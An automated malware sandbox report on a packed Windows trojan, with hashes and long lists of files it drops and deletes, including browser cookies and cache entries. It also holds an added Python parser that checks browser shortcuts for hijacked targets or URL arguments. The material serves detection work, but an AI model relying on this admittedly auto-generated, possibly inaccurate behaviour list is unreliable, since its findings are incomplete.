Gen.Variant.Zusy.208909_adca3c78da

by malwarelabrobot on September 6th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.208909 (B) (Emsisoft), Gen:Variant.Zusy.208909 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: adca3c78dafc4406e4d08628972e8236
SHA1: 5fcbaa44d537a621f51f4777d71669a2b0cf7570
SHA256: 0c130395adf4a164e987e01632839cdbc8b8f09270ee9d3ad253d09e724539ce
SSDeep: 24576:TZ3uo53lJmsAt7hZSwon3VwRRtWCFBJBzk7q:Thb3xAt5tWCn47
Size: 1033520 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-09 19:23:37
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3676
adca3c78dafc4406e4d0862872e8236.exe:260

The Trojan injects its code into the following process(es):
No code injection into other processes was observed.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (7948 bytes)
C:\Windows\LqYWOJJH.dll (13 bytes)

The Trojan deletes the following file(s):

C:\Windows\LqYWOJJH.dll (0 bytes)

The process adca3c78dafc4406e4d0862872e8236.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\r[1].json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[1].json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[2].json (1 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\r[1].json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Windows\PHTQYMp\WVqSMf.dll (16404 bytes)
C:\Windows\PHTQYMp\GMpkepQXi.dll (12 bytes)
C:\Windows\ovhlpnij.dll (13 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (276 bytes)
C:\Windows\PHTQYMp\QPofTRsG.dll (992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\Windows\System32\1428b5\CDClient_EX.sys (117 bytes)
C:\Windows\PHTQYMp\oBIxFFT.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\PHTQYMp\LNYxeOwQr.dll (264 bytes)
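The list above records writes to the Google Chrome, Mozilla Firefox and Internet Explorer shortcuts on the public desktop, in Quick Launch and on the pinned taskbar, but the sandbox logs only that the .lnk files were written, not what changed in them. Those shortcuts are worth opening on an affected host: a stock browser shortcut points at the browser binary and carries no command-line arguments, so an argument string (above all one containing a URL) or a target that is not the browser is what to look for. The parser below is an added example, not part of this report and not code from the sample. It follows the public MS-SHLLINK layout (fixed header, optional LinkTargetIDList and LinkInfo, then the StringData fields), reads the target and COMMAND_LINE_ARGUMENTS, and flags deviations. The shortcuts it checks in demo() are constructed in the code; the report does not say what this sample wrote into the shortcuts, so treat the URL check as a general test, not as a description of this sample's behaviour.

```python
"""Inspect the browser shortcuts the report shows being rewritten.
Added example, not part of the Lavasoft report: structure offsets follow the
public MS-SHLLINK specification; the shortcut bytes used by demo() are constructed."""
import os
import struct
from typing import Dict, List, Optional

# LinkFlags bits (MS-SHLLINK 2.1.1) that say which structures follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

def parse_lnk(data: bytes) -> Dict[str, Optional[str]]:
    """Return LocalBasePath (from LinkInfo) and the StringData fields of a .lnk."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    fields: Dict[str, Optional[str]] = {"local_base_path": None}
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (u16) + the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _li_header_size, li_flags = struct.unpack_from("<III", data, pos)
        if li_flags & 0x1:                           # VolumeIDAndLocalBasePath
            start = pos + struct.unpack_from("<I", data, pos + 16)[0]
            end = data.index(b"\0", start)
            fields["local_base_path"] = data[start:end].decode("cp1252", "replace")
        pos += li_size
    for key, bit in STRING_FIELDS:                   # CountCharacters (u16) + chars, no NUL
        if not flags & bit:
            fields[key] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + count * width]
        pos += 2 + count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields

def check_shortcut(data: bytes, expected_exe: str) -> List[str]:
    """Findings for one browser shortcut. A stock shortcut targets the browser
    binary and carries no arguments, so an argument string (above all one with a
    URL) or a target that is not the browser is what a shortcut hijack looks like."""
    f = parse_lnk(data)
    findings: List[str] = []
    target = f["local_base_path"] or f["relative_path"] or ""
    if target and not target.lower().endswith(expected_exe.lower()):
        findings.append(f"target {target!r} is not {expected_exe}")
    args = (f["arguments"] or "").strip()
    if args:
        findings.append(f"unexpected arguments {args!r}")
    if "http://" in args.lower() or "https://" in args.lower():
        findings.append("arguments contain a URL")
    return findings

def build_lnk(relative_path: str, arguments: Optional[str] = None) -> bytes:
    """Constructed minimal Unicode .lnk with only RELATIVE_PATH and, if given,
    COMMAND_LINE_ARGUMENTS. Test input for demo(), not a file from the report."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I16sII", HEADER_SIZE, LNK_CLSID, flags, 0x20)  # FILE_ATTRIBUTE_ARCHIVE
    header += b"\0" * 24                                                  # three FILETIMEs
    header += struct.pack("<IiIHHII", 0, 0, 1, 0, 0, 0, 0)                # FileSize .. Reserved3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments) if s is not None)
    return header + body

def demo() -> Dict[str, List[str]]:
    """Three constructed shortcuts: stock Chrome, Chrome with a URL argument,
    and one pointing at a different executable."""
    chrome = r"..\..\..\Program Files\Google\Chrome\Application\chrome.exe"
    return {
        "clean": check_shortcut(build_lnk(chrome), "chrome.exe"),
        "hijacked": check_shortcut(build_lnk(chrome, "http://example.invalid/start"), "chrome.exe"),
        "retargeted": check_shortcut(build_lnk(r"..\other.exe"), "chrome.exe"),
    }

if __name__ == "__main__":
    # Two of the shortcut locations from the report's file-activity list, if present.
    for raw, exe in ((r"%PUBLIC%\Desktop\Google Chrome.lnk", "chrome.exe"),
                     (r"%PUBLIC%\Desktop\Mozilla Firefox.lnk", "firefox.exe")):
        path = os.path.expandvars(raw)
        if os.path.exists(path):
            with open(path, "rb") as fh:
                print(path, check_shortcut(fh.read(), exe) or "clean")
    print(demo())
```

On a live host, run the main block as the affected user so that %PUBLIC% and the per-user Quick Launch paths resolve, or point check_shortcut() at .lnk files copied off a disk image. Real shortcuts usually carry a LinkTargetIDList and LinkInfo rather than a RELATIVE_PATH, which is why the parser prefers LocalBasePath as the target; a shortcut whose target is the browser and whose arguments are empty is the expected, clean state.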

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\AllServices[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\19628 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K3H6JGON.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Windows\PHTQYMp\GMpkepQXi.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\MG_en-us[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Windows\System32\1428b5\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Windows\PHTQYMp\LNYxeOwQr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9563C38CC53D34D0B1FB8D66675A7E1BBB4A7575 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GetMDRCDPOSTURL[1].aspx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\3 (0 bytes)
